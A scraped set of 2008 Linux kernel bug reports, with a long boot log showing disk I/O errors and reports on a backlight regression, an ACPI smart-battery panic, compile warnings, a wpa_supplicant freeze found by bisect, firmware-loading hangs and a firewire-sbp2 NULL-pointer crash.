Incorporated [ALI] Aspire 5024WLMi Flags: bus master, medium devsel, latency 64, IRQ 11 Memory at c0209000 (32-bit, non-prefetchable) [size=256] Memory at c0208c00 (32-bit, non-prefetchable) [size=256] Memory at c0208800 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 06:07.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, 66MHz, medium devsel, latency 64, IRQ 11 I/O ports at a000 [size=256] Memory at c0209400 (32-bit, non-prefetchable) [size=256] [virtual] Expansion ROM at c0220000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 dmesg: Linux version 2.6.24-gentoo-r2 (root@fuf) (gcc version 4.2.2 (Gentoo 4.2.2 p1.0)) #2 PREEMPT Mon Feb 11 18:58:21 CET 2008 Command line: root=/dev/hda5 udev powernow-k8.vcore_list=1125,925 usbcore.autosuspend=1 hpet=force BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009b800 (usable) BIOS-e820: 000000000009b800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000004fea0000 (usable) BIOS-e820: 000000004fea0000 - 000000004feae000 (ACPI data) BIOS-e820: 000000004feae000 - 000000004ff00000 (ACPI NVS) BIOS-e820: 000000004ff00000 - 0000000050000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) Entering add_active_range(0, 0, 155) 0 entries of 256 used Entering add_active_range(0, 256, 327328) 1 entries of 256 used end_pfn_map = 1048576 DMI 2.3 present. ACPI: RSDP 000F6DA0, 0014 (r0 PTLTD ) ACPI: RSDT 4FEA81E3, 0034 (r1 PTLTD RSDT 6040000 LTP 0) ACPI: FACP 4FEADE41, 0074 (r1 ATI Piranha 6040000 ATI F4240) ACPI: DSDT 4FEA8217, 5C2A (r1 ATI SB400 6040000 MSFT 100000E) ACPI: FACS 4FEAEFC0, 0040 ACPI: SSDT 4FEADEB5, 00B5 (r1 PTLTD POWERNOW 6040000 LTP 1) ACPI: APIC 4FEADF6A, 005A (r1 PTLTD APIC 6040000 LTP 0) ACPI: MCFG 4FEADFC4, 003C (r1 PTLTD MCFG 6040000 LTP 0) ACPI: DMI detected: Acer Entering add_active_range(0, 0, 155) 0 entries of 256 used Entering add_active_range(0, 256, 327328) 1 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 DMA32 4096 -&gt; 1048576 Normal 1048576 -&gt; 1048576 Movable zone start PFN for each node early_node_map[2] active PFN ranges 0: 0 -&gt; 155 0: 256 -&gt; 327328 On node 0 totalpages: 327227 DMA zone: 56 pages used for memmap DMA zone: 1371 pages reserved DMA zone: 2568 pages, LIFO batch:0 DMA32 zone: 4419 pages used for memmap DMA32 zone: 318813 pages, LIFO batch:31 Normal zone: 0 pages used for memmap Movable zone: 0 pages used for memmap ATI board detected. Disabling timer routing over 8254. ACPI: PM-Timer IO Port: 0x8008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 (Bootup-CPU) ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 1, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 high edge) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 21 low level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. Setting APIC routing to flat Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 60000000 (gap: 50000000:aec00000) Built 1 zonelists in Zone order, mobility grouping on. Total pages: 321381 Kernel command line: root=/dev/hda5 udev powernow-k8.vcore_list=1125,925 usbcore.autosuspend=1 hpet=force Initializing CPU#0 PID hash table entries: 4096 (order: 12, 32768 bytes) TSC calibrated against PM_TIMER time.c: Detected 1599.999 MHz processor. Console: colour VGA+ 80x25 console [tty0] enabled Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes) Checking aperture... CPU 0: aperture @ 180000000 size 32 MB Aperture too small (32 MB) No AGP bridge found Memory: 1282044k/1309312k available (3486k kernel code, 26556k reserved, 1281k data, 216k init) Calibrating delay using timer specific routine.. 3202.05 BogoMIPS (lpj=1601028) Mount-cache hash table entries: 256 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 512K (64 bytes/line) CPU: AMD Turion(tm) 64 Mobile Technology ML-28 stepping 02 ACPI: Core revision 20070126 ACPI: Table DSDT replaced by host OS ACPI: DSDT 00000000, 5624 (r1 ATI SB400 6040000 INTL 20061109) ACPI: DSDT override uses original SSDTs unless "acpi_no_auto_ssdt"&lt;3&gt;..MP-BIOS bug: 8254 timer not connected to IO-APIC Using local APIC timer interrupts. APIC timer calibration result 12499988 Detected 12.499 MHz APIC timer. net_namespace: 120 bytes NET: Registered protocol family 16 ACPI: bus type pci registered PCI: BIOS Bug: MCFG area at e0000000 is not E820-reserved PCI: Not using MMCONFIG. PCI: Using configuration type 1 ACPI: EC: Look up EC in DSDT ACPI: Interpreter enabled ACPI: (supports S0 S3 S5) ACPI: Using IOAPIC for interrupt routing ACPI: EC: non-query interrupt received, switching to interrupt mode ACPI: EC: GPE = 0x3, I/O: command/status = 0x66, data = 0x62 ACPI: EC: driver started in interrupt mode ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Transparent bridge - 0000:00:14.4 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PB6_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PB7_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKB] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKC] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKD] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKE] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKF] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKG] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 10 11) *0, disabled. Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 10 devices ACPI: ACPI bus type pnp unregistered SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report PCI: Cannot allocate resource region 7 of bridge 0000:00:06.0 PCI: Cannot allocate resource region 8 of bridge 0000:00:06.0 PCI: Cannot allocate resource region 7 of bridge 0000:00:07.0 PCI: Cannot allocate resource region 8 of bridge 0000:00:07.0 ACPI: RTC can wake from S4 Time: tsc clocksource has been installed. system 00:01: iomem range 0xe0000000-0xefffffff has been reserved system 00:01: iomem range 0xfec00000-0xfec00fff could not be reserved system 00:01: iomem range 0xfee00000-0xfee00fff could not be reserved system 00:08: ioport range 0x1080-0x1080 has been reserved system 00:08: ioport range 0x1200-0x120f has been reserved system 00:08: ioport range 0x500-0x51f has been reserved system 00:08: ioport range 0x40b-0x40b has been reserved system 00:08: ioport range 0x4d0-0x4d1 has been reserved system 00:08: ioport range 0x4d6-0x4d6 has been reserved system 00:08: ioport range 0xc00-0xc01 has been reserved system 00:08: ioport range 0xc14-0xc14 has been reserved system 00:08: ioport range 0xc50-0xc52 has been reserved system 00:08: ioport range 0xc6c-0xc6c has been reserved system 00:08: ioport range 0xc6f-0xc6f has been reserved system 00:08: ioport range 0xcd4-0xcd5 has been reserved system 00:08: ioport range 0xcd6-0xcd7 has been reserved system 00:08: ioport range 0xcd8-0xcdf has been reserved system 00:08: ioport range 0x8000-0x805f has been reserved system 00:08: ioport range 0xf40-0xf47 has been reserved system 00:08: ioport range 0x87f-0x87f has been reserved system 00:09: iomem range 0xe0000-0xfffff could not be reserved system 00:09: iomem range 0xfff80000-0xffffffff could not be reserved system 00:09: iomem range 0x0-0xfff could not be reserved PCI: Bridge: 0000:00:02.0 IO window: 9000-9fff MEM window: c0100000-c01fffff PREFETCH window: c8000000-cfffffff PCI: Bridge: 0000:00:06.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:07.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bus 7, cardbus bridge: 0000:06:06.0 IO window: 0000a400-0000a4ff IO window: 0000a800-0000a8ff PREFETCH window: 60000000-63ffffff MEM window: 64000000-67ffffff PCI: Bridge: 0000:00:14.4 IO window: a000-afff MEM window: c0200000-c02fffff PREFETCH window: disabled. PCI: Setting latency timer of device 0000:00:02.0 to 64 PCI: Setting latency timer of device 0000:00:06.0 to 64 PCI: Setting latency timer of device 0000:00:07.0 to 64 ACPI: PCI Interrupt 0000:06:06.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 NET: Registered protocol family 2 IP route cache hash table entries: 65536 (order: 7, 524288 bytes) TCP established hash table entries: 262144 (order: 10, 4194304 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 262144 bind 65536) TCP reno registered SGI XFS with large block/inode numbers, no debug enabled io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) PCI: MSI quirk detected. MSI deactivated. Boot video device is 0000:01:00.0 PCI: Setting latency timer of device 0000:00:02.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:02.0:pcie00] PCI: Setting latency timer of device 0000:00:06.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:06.0:pcie00] PCI: Setting latency timer of device 0000:00:07.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:07.0:pcie00] Generic RTC Driver v1.07 Linux agpgart interface v0.102 ACPI: AC Adapter [ADP1] (on-line) ACPI: Battery Slot [BAT0] (battery absent) input: Power Button (FF) as /devices/virtual/input/input0 ACPI: Power Button (FF) [PWRF] input: Lid Switch as /devices/virtual/input/input1 ACPI: Lid Switch [LID0] input: Sleep Button (CM) as /devices/virtual/input/input2 ACPI: Sleep Button (CM) [SLPB] ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Thermal Zone [TZS0] (57 C) ACPI: Thermal Zone [TZS1] (53 C) ACPI: Thermal Zone [TZSV] (65 C) loop: module loaded Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ATIIXP: IDE controller (0x1002:0x4376 rev 0x00) at PCI slot 0000:00:14.1 ACPI: PCI Interrupt 0000:00:14.1[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ATIIXP: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x8410-0x8417, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x8418-0x841f, BIOS settings: hdc:DMA, hdd:pio Probing IDE interface ide0... Switched to high resolution mode on CPU 0 hda: ST9160821A, ATA DISK drive hda: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hda: UDMA/100 mode selected ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: MATSHITAUJ-845D, ATAPI CD/DVD-ROM drive hdc: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hdc: UDMA/33 mode selected ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 512KiB hda: 312581808 sectors (160041 MB) w/8192KiB Cache, CHS=19457/255/63 hda: cache flushes supported hda: hda1 hda2 hda3 &lt; hda5 hda6 &gt; hdc: ATAPI 24X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache Uniform CD-ROM driver Revision: 3.20 Driver 'sd' needs updating - please use bus_type methods ACPI: PCI Interrupt 0000:06:06.2[C] -&gt; GSI 22 (level, low) -&gt; IRQ 22 firewire_ohci: Added fw-ohci device 0000:06:06.2, OHCI version 1.10 PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 i8042.c: Detected active multiplexing controller, rev 1.1. serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX0 port at 0x60,0x64 irq 12 serio: i8042 AUX1 port at 0x60,0x64 irq 12 serio: i8042 AUX2 port at 0x60,0x64 irq 12 serio: i8042 AUX3 port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input3 rtc_cmos 00:04: rtc core: registered rtc_cmos as rtc0 rtc0: alarms up to one month i2c /dev entries driver device-mapper: ioctl: 4.12.0-ioctl (2007-10-02) initialised: dm-devel@redhat.com cpuidle: using governor ladder firewire_core: created new fw device fw0 (0 config rom retries, S400) Synaptics Touchpad, model: 1, fw: 6.2, id: 0x12a0b1, caps: 0xa04713/0x204000 input: SynPS/2 Synaptics TouchPad as /devices/platform/i8042/serio4/input/input4 cpuidle: using governor menu Advanced Linux Sound Architecture Driver Version 1.0.15 (Tue Nov 20 19:16:42 2007 UTC). ALSA device list: No soundcards found. TCP cubic registered NET: Registered protocol family 1 NET: Registered protocol family 17 RPC: Registered udp transport module. RPC: Registered tcp transport module. powernow-k8: Found 1 AMD Turion(tm) 64 Mobile Technology ML-28 processors (1 cpu cores) (version 2.20.00) powernow-k8: Requested Voltage for id0 is 1125 mV default voltage is 1450 powernow-k8: Performing required adjustment of 325 mV or 13 25mV steps powernow-k8: Requested Voltage for id1 is 925 mV default voltage is 1000 powernow-k8: Performing required adjustment of 75 mV or 3 25mV steps powernow-k8: 0 : fid 0x8 (1600 MHz), vid 0x11 powernow-k8: 1 : fid 0x0 (800 MHz), vid 0x19 rtc_cmos 00:04: setting system clock to 2008-02-14 08:47:44 UTC (1202978864) Marking TSC unstable due to TSC halts in idle Time: acpi_pm clocksource has been installed. XFS mounting filesystem hda5 Starting XFS recovery on filesystem: hda5 (logdev: internal) Ending XFS recovery on filesystem: hda5 (logdev: internal) VFS: Mounted root (xfs filesystem) readonly. Freeing unused kernel memory: 216k freed Clocksource tsc unstable (delta = -91005859 ns) ACPI: WMI-Acer: Mapper loaded acer_acpi: Acer Laptop ACPI Extras version 0.10.0 acer_acpi: Detected Acer AMW0 interface Registered led device: acer_acpi:mail fuse init (API version 7.9) ndiswrapper version 1.52 loaded (smp=no, preempt=yes) ndiswrapper (link_pe_images:576): fixing KI_USER_SHARED_DATA address in the driver ndiswrapper: driver bcmwl5 (Broadcom,02/11/2005, 3.100.64.0) loaded ACPI: PCI Interrupt 0000:06:05.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ndiswrapper: using IRQ 21 wlan0: ethernet device 00:0e:9b:bf:b0:b8 using NDIS driver: bcmwl5, version: 0x364400a, NDIS version: 0x501, vendor: 'NDIS Network Adapter', 14E4:4318.5.conf wlan0: encryption modes supported: WEP; TKIP with WPA, WPA2, WPA2PSK; AES/CCMP with WPA, WPA2, WPA2PSK usbcore: registered new interface driver ndiswrapper Adding 2449872k swap on /dev/mapper/crypt-swap. Priority:-1 extents:1 across:2449872k ACPI: PCI Interrupt 0000:00:14.5[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 ndiswrapper: device wlan0 removed ACPI: PCI interrupt for device 0000:06:05.0 disabled usbcore: deregistering interface driver ndiswrapper ndiswrapper version 1.52 loaded (smp=no, preempt=yes) ndiswrapper (link_pe_images:576): fixing KI_USER_SHARED_DATA address in the driver ndiswrapper: driver bcmwl5 (Broadcom,02/11/2005, 3.100.64.0) loaded ACPI: PCI Interrupt 0000:06:05.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ndiswrapper: using IRQ 21 wlan0: ethernet device 00:0e:9b:bf:b0:b8 using NDIS driver: bcmwl5, version: 0x364400a, NDIS version: 0x501, vendor: 'NDIS Network Adapter', 14E4:4318.5.conf wlan0: encryption modes supported: WEP; TKIP with WPA, WPA2, WPA2PSK; AES/CCMP with WPA, WPA2, WPA2PSK usbcore: registered new interface driver ndiswrapper [drm] Initialized drm 1.1.0 20060810 ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:01:00.0 to 64 [drm] Initialized radeon 1.28.0 20060524 on minor 0 [drm] Setting GART location based on new memory map [drm] Loading R300 Microcode [drm] writeback test succeeded in 1 usecs XFS mounting filesystem hda6 Starting XFS recovery on filesystem: hda6 (logdev: internal) Ending XFS recovery on filesystem: hda6 (logdev: internal) APIC error on CPU0: 00(40) hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: 0xea hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: DMA disabled hda: drive not ready for command ide0: reset: master: error (0x00?) hda: status error: status=0x00 { } ide: failed opcode was: unknown hda: drive not ready for command hda: status error: status=0x00 { } ide: failed opcode was: unknown hda: drive not ready for command hda: status error: status=0x10 { SeekComplete } ide: failed opcode was: unknown hda: drive not ready for command hda: status error: status=0x10 { SeekComplete } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: 0xea hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset: success APIC error on CPU0: 40(40) hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: unknown ide0: reset timed-out, status=0x80 hda: status timeout: status=0x80 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset: success hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: 0xea hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset timed-out, status=0x80 hda: status timeout: status=0x80 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset: success hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: 0xea hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset timed-out, status=0x80 hda: status timeout: status=0x80 { Busy } ide: failed opcode was: unknown hda: drive not ready for command ide0: reset: success hda: irq timeout: status=0xd0 { Busy } ide: failed opcode was: 0xea hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success psmouse.c: TouchPad at isa0060/serio4/input0 lost synchronization, throwing 2 bytes away. hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success hda: status timeout: status=0xd0 { Busy } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE_EXT ide0: reset: success</t>
  </si>
  <si>
    <t>2.6.25-rc1 regression - backlight controls stopped working - ThinkPad T61</t>
  </si>
  <si>
    <t>2008-02-15 04:51 UTC</t>
  </si>
  <si>
    <t>2008-07-03 03:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25-rc1 Distribution: Ubuntu/Hardy Hardware Environment: ThinkPad T61 Software Environment: n/a Problem Description: /sys/class/backlight/acpi_video0 does not control backlight, nothing happens if I change brightness. Steps to reproduce: echo {15,5,0} &gt; /sys/class/backlight/acpi_video0/brightness nothing happens.</t>
  </si>
  <si>
    <t>SCI interrupt storm - lost keystrokes - Acer Travelmate 4002</t>
  </si>
  <si>
    <t>2008-02-16 02:41 UTC</t>
  </si>
  <si>
    <t>Black</t>
  </si>
  <si>
    <t>2009-04-07 02:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 (with genpatches 6 and tuxonice) Earliest failing kernel version: 2.6.24.2 Distribution: Gentoo Hardware Environment: Acer Travelmate 4002 (with Smart Battery) Problem Description: When I first booted 2.6.24 (config based on the working one from 2.6.23) it paniced. I figured it was a problem with the Smart Battery-Code, so I compiled it as a module (CONFIG_ACPI_SBS=m), hoping to be able to get the trace when I load the module. Indeed the kernel booted without problem this time. The module loaded just fine as well. But I lose keypresses if (and only if) the module is loaded. I remember this behaviour (lost keypresses, not sure about the panic) from earlier kernel-versions (forgot which one(s)), when Smart Battery-support was just introduced. Maybe I should note, that the DSDT is buggy. Here's what I wrote down on a paper when the kernel paniced on boot: BUG: unable to handle paging request at virtual address ... printing eip: ... Oops: 0002 [#1] PREEMPT Modules linked in: Pid: 1, comm: swapper Not tainted (2.6.24.2) ... Call trace: mutex_lock acpi_smbus_transaction ida_get_new_above sysfs_ilookup_test acpi_smbus_read acpi_ac_get_present acpi_sbs_add ... EIP: __mutex_lock_slowpath end trace note: swapper[1] exited with preempt_count 1 Kernel panic - not syncing: Attempted to kill init! Switched to NOHz mode on CPU #0 I hope this very incomplete output is a little useful. Steps to reproduce: 1. compile and install kernel with CONFIG_ACPI_SBS=y 2. reboot 3. see the panic 4. compile and install kernel with CONFIG_ACPI_SBS=m 5. reboot 6. modprobe sbs 7. type something, some letters/keys are missing</t>
  </si>
  <si>
    <t>2.6.25-rc2+{-git1}</t>
  </si>
  <si>
    <t>genhd.c compilation warning on 2.6.25-rc2+{-git1}</t>
  </si>
  <si>
    <t>2008-02-16 05:58 UTC</t>
  </si>
  <si>
    <t>2008-06-01 12:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels this compilation warning occurs for block/ CC block/genhd.o block/genhd.c: In function ‘genhd_device_init’: block/genhd.c:361: attention : ignoring return value of ‘class_register’, declared with attribute warn_unused_result Steps to reproduce:</t>
  </si>
  <si>
    <t>radeon_base.c compilation warning on 2.6.25-rc2+{-git1}</t>
  </si>
  <si>
    <t>2008-02-16 06:04 UTC</t>
  </si>
  <si>
    <t>2008-09-23 14:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels this compilation warning occurs for drivers/video/aty/ CC drivers/video/aty/radeon_base.o drivers/video/aty/radeon_base.c: In function ‘radeonfb_pci_register’: drivers/video/aty/radeon_base.c:2334: attention : ignoring return value of ‘sysfs_create_bin_file’, declared with attribute warn_unused_result drivers/video/aty/radeon_base.c:2336: attention : ignoring return value of ‘sysfs_create_bin_file’, declared with attribute warn_unused_result Steps to reproduce:</t>
  </si>
  <si>
    <t>wpa_supplicant doens't work and froze the computer</t>
  </si>
  <si>
    <t>2008-02-16 08:25 UTC</t>
  </si>
  <si>
    <t>2008-02-26 08:26 UTC</t>
  </si>
  <si>
    <t>9946 10005 10009 10014 10058</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc1 Earliest failing kernel version: 2.6.25-rc2 Distribution: Gentoo Hardware Environment: Intel Core 2 Duo, Intel Wifi 4965AGN, Packard Bell EasyNoteMB86 Software Environment: Problem Description: I have tried 2.6.25-rc2 and there is causes wpa_supplicant to fails and freeze the computer when it is started. I am using WPA-PSK with CCMP encryption. A git-bisect run shows that the first bad commit is the following: 45b503548210fe6f23e92b856421c2a3f05fd034 is first bad commit commit 45b503548210fe6f23e92b856421c2a3f05fd034 Author: Laszlo Attila Toth &lt;panther@balabit.hu&gt; Date: Tue Feb 12 22:42:09 2008 -0800 [RTNETLINK]: Send a single notification on device state changes. In do_setlink() a single notification is sent at the end of the function if any modification occured. If the address has been changed, another notification is sent. Both of them is required because originally only the NETDEV_CHANGEADDR notification was sent and although device state change implies address change, some programs may expect the original notification. It remains for compatibity. If set_operstate() is called from do_setlink(), it doesn't send a notification, only if it is called from rtnl_create_link() as earlier. Signed-off-by: Laszlo Attila Toth &lt;panther@balabit.hu&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; If I revert it, wpa_supplicant works correctly. Steps to reproduce: boot gentoo and wait for net.wlan0 to start. When wpa_supplicant is called, it blocks the computer</t>
  </si>
  <si>
    <t>Drivers that require ext. firmware may hang on boot</t>
  </si>
  <si>
    <t>2008-02-16 12:41 UTC</t>
  </si>
  <si>
    <t>2009-03-24 04:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian testing Hardware Environment: Core2 Duo, i965GM Software Environment: Problem Description: When compiling drivers such as dvb-usb-nova-t-usb2 (that requires external firmware to be provided) into the kernel (not as module) the boot process will hang when loading the driver because there is no filesystem to load the firmware from. This is quite annoying because the kernel will have to be recompiled with those drivers as modules. Steps to reproduce: Build a kernel with dvb-usb-nova-t-usb2=y and boot it. Here's a suggestion, dunno if this is even possible: We already do have support for an initial ramdisk which is supposed to load external drivers. If the initial ramdisk would be initialised and mounted after filesystem drivers are loaded and before other drivers (that are not required for the ramdisk to work), one could load firmware from the ramdisk. init would have to be run after all drivers are initialised, just like now - only the mounting should be done earlier. Another - but less satisfying - solution would be to compile the firmware into the kernel. I saw this solution with a Hauppauge DVB-S PCI card (Nexus-S). best regards, Peter</t>
  </si>
  <si>
    <t>firewire-sbp2: rescan-scsi-bus segfault, sbp2_scsi_slave_alloc NULL pointer dereference</t>
  </si>
  <si>
    <t>2.6.22...2.6.25-rc</t>
  </si>
  <si>
    <t>2008-02-17 04:53 UTC</t>
  </si>
  <si>
    <t>2008-03-11 05:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc2 (suspected), 2.6.24 + firewire updates (tested) Earliest failing kernel version: 2.6.22 (suspected), 2.6.24 + firewire updates (tested) Distribution: Gentoo Hardware Environment: x86-32 Software Environment: Problem Description: The /proc scsi-add-single method is dangerous to use with firewire-sbp2. Steps to reproduce: 1.) Manually remove a scsi_device and scsi_target via sysfs, behind firewire-sbp2's back. # echo 1 &gt; /sys/devices/pci0000\:00/0000:00:1e.0/0000:05:04.0/fw1/fw1.0/host63/target63:0:0/63:0:0:0/delete 2.) Scan for SCSI devices via SCSI core's proc interface. # rescan-scsi-bus Host adapter 0 (ata_piix) found. Host adapter 1 (ata_piix) found. Host adapter 63 (sbp2) found. Scanning SCSI subsystem for new devices Scanning host 0 channels 0 for SCSI target IDs 0 1 2 3 4 5 6 7, all LUNs Scanning for device 0 0 0 0 ... OLD: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3750640AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Scanning host 1 channels 0 for SCSI target IDs 0 1 2 3 4 5 6 7, all LUNs Scanning for device 1 0 0 0 ... OLD: Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3750640AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Scanning for device 1 0 1 0 ... OLD: Host: scsi1 Channel: 00 Id: 01 Lun: 00 Vendor: ATA Model: ST3750640AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Scanning host 63 channels 0 for SCSI target IDs 0 1 2 3 4 5 6 7, all LUNs Scanning for device 63 0 0 0 ... NEW: Segmentation fault 3.) This results in a NULL pointer dereference: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: f919300c *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: firewire_sbp2 firewire_ohci firewire_core crc_itu_t nls_iso8859_1 nls_cp850 vfat fat usb_storage sr_mod ext3 jbd cpufreq_ondemand acpi_cpufreq freq_table i915 drm snd_pcm_oss snd_mixer_oss snd_seq_oss snd_seq_midi_event snd_seq 